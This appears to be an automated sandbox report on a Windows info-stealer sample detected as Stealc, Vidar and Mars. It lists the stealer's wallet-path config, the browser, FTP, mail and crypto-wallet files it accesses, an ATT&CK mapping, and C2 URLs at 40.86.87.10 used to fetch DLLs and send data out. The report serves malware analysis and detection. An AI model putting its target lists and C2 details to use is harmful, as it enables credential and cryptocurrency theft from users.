Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: i3NmF0obCm.exe, type: SAMPLE
Source: Yara match	File source: 0.2.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: decrypted.binstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: i3NmF0obCm.exe, type: SAMPLE
Source: Yara match	File source: 0.2.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6C0C40 sqlite3_bind_zeroblob,	0_2_6C6C0C40
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6C0D60 sqlite3_bind_parameter_name,	0_2_6C6C0D60
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5E8EA0 sqlite3_clear_bindings,	0_2_6C5E8EA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6C0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C6C0B40
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5E6410 bind,WSAGetLastError,	0_2_6C5E6410

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 Process Injection	1 Masquerading	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Email Collection	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	4 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	144 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
i3NmF0obCm.exe	59%	Virustotal		Browse
i3NmF0obCm.exe	71%	ReversingLabs	Win32.Trojan.Stealerc
i3NmF0obCm.exe	100%	Avira	TR/Crypt.ZPACK.Gen

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://40.86.87.10/108e010e8f91c38c.php%	100%	Avira URL Cloud	malware
http://40.86.87.10/108e010e8f91c38c.php(	100%	Avira URL Cloud	malware
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	Avira URL Cloud	safe
http://40.86.87.10/b13597c85f807692/msvcp140.dll	100%	Avira URL Cloud	malware
http://40.86.87.10/b13597c85f807692/softokn3.dllJtx	100%	Avira URL Cloud	malware
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	Avira URL Cloud	safe
http://40.86.87.10/b13597c85f807692/msvcp140.dll	0%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://40.86.87.10/108e010e8f91c38c.php:	100%	Avira URL Cloud	malware
http://40.86.87.10/b13597c85f807692/freebl3.dll	100%	Avira URL Cloud	malware
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://40.86.87.10/108e010e8f91c38c.php9	100%	Avira URL Cloud	malware
http://40.86.87.10	100%	Avira URL Cloud	malware
http://40.86.87.10/108e010e8f91c38c.php2	100%	Avira URL Cloud	malware
http://40.86.87.10/b13597c85f807692/mozglue.dllv	100%	Avira URL Cloud	malware
http://40.86.87.10/b13597c85f807692/nss3.dllowser	100%	Avira URL Cloud	malware
http://40.86.87.10	2%	Virustotal		Browse
http://40.86.87.10/b13597c85f807692/freebl3.dll$	100%	Avira URL Cloud	malware
http://40.86.87.10/108e010e8f91c38c.php~	100%	Avira URL Cloud	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
http://40.86.87.10/b13597c85f807692/vcruntime140.dll	100%	Avira URL Cloud	malware
http://40.86.87.10/b13597c85f807692/mozglue.dllL	100%	Avira URL Cloud	malware
http://40.86.87.10/b13597c85f807692/freebl3.dll	0%	Virustotal		Browse
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe	0%	Avira URL Cloud	safe
http://40.86.87.10/b13597c85f807692/sqlite3.dll	100%	Avira URL Cloud	malware
http://40.86.87.10/b13597c85f807692/vcruntime140.dll	0%	Virustotal		Browse
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	Avira URL Cloud	safe
https://cdn.epnacl	0%	Avira URL Cloud	safe
http://40.86.87.10/b13597c85f807692/sqlite3.dll	0%	Virustotal		Browse
http://40.86.87.10/108e010e8f91c38c.php	100%	Avira URL Cloud	malware
http://40.86.87.10/b13597c85f807692/freebl3.dll:	100%	Avira URL Cloud	malware
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
https://mozilla.org0/	0%	Avira URL Cloud	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://40.86.87.10/108e010e8f91c38c.phposition:	100%	Avira URL Cloud	malware
http://40.86.87.10/108e010e8f91c38c.phpe	100%	Avira URL Cloud	malware
http://40.86.87.10/108e010e8f91c38c.php	3%	Virustotal		Browse
http://www.mozilla.com/en-US/blocklist/	0%	Virustotal		Browse
http://40.86.87.10/108e010e8f91c38c.phpirefox	100%	Avira URL Cloud	malware
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
http://40.86.87.10/108e010e8f91c38c.phposition:	0%	Virustotal		Browse
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	Virustotal		Browse
http://40.86.87.10/b13597c85f807692/nss3.dllll	0%	Virustotal		Browse
http://40.86.87.10/b13597c85f807692/nss3.dllll	100%	Avira URL Cloud	malware
http://40.86.87.10/b13597c85f807692/mozglue.dll	0%	Virustotal		Browse
http://40.86.87.10/108e010e8f91c38c.	100%	Avira URL Cloud	malware
http://40.86.87.10/b13597c85f807692/nss3.dllllU	100%	Avira URL Cloud	malware
http://40.86.87.10/b13597c85f807692/softokn3.dll	100%	Avira URL Cloud	malware
http://40.86.87.10/b13597c85f807692/mozglue.dll	100%	Avira URL Cloud	malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
http://40.86.87.10/108e010e8f91c38c.php976cbc684762e42ee25308426ba0ad93	100%	Avira URL Cloud	malware
http://40.86.87.10/108e010e8f91c38c.phpv	100%	Avira URL Cloud	malware
https://cdn.ep	0%	Avira URL Cloud	safe
http://40.86.87.10/108e010e8f91c38c.phpI	100%	Avira URL Cloud	malware
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	Avira URL Cloud	safe
http://40.86.87.10/b13597c85f807692/nss3.dll	100%	Avira URL Cloud	malware
http://40.86.87.10/b13597c85f807692/nss3.dllQ	100%	Avira URL Cloud	malware
http://40.86.87.10/108e010e8f91c38c.php-LTC	100%	Avira URL Cloud	malware
http://40.86.87.10/b13597c85f807692/softokn3.dll	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://40.86.87.10/b13597c85f807692/msvcp140.dll	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/freebl3.dll	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/vcruntime140.dll	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/sqlite3.dll	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/108e010e8f91c38c.php	true	3%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/mozglue.dll	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/softokn3.dll	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/nss3.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	GCGDGHCB.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	false	Avira URL Cloud: safe	unknown
http://40.86.87.10/108e010e8f91c38c.php(	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	GCGDGHCB.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://40.86.87.10/108e010e8f91c38c.php%	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/softokn3.dllJtx	i3NmF0obCm.exe, 00000000.00000002.1880536045.0000000027931000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	false	Avira URL Cloud: safe	unknown
http://40.86.87.10/108e010e8f91c38c.php:	i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr	false	URL Reputation: safe	unknown
http://40.86.87.10/108e010e8f91c38c.php9	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp, i3NmF0obCm.exe, 00000000.00000003.1724627062.000000002185D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://40.86.87.10	i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/108e010e8f91c38c.php2	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/mozglue.dllv	i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/nss3.dllowser	i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	DGCBKECAKFBGCAKECGIE.0.dr	false	Avira URL Cloud: safe	unknown
http://40.86.87.10/b13597c85f807692/freebl3.dll$	i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr	false	URL Reputation: safe	unknown
http://40.86.87.10/108e010e8f91c38c.php~	i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe	i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://40.86.87.10/b13597c85f807692/mozglue.dllL	i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe	i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	false	Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883712196.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.epnacl	i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://40.86.87.10/b13597c85f807692/freebl3.dll:	i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.mozilla.com/en-US/blocklist/	i3NmF0obCm.exe, i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	Avira URL Cloud: safe	unknown
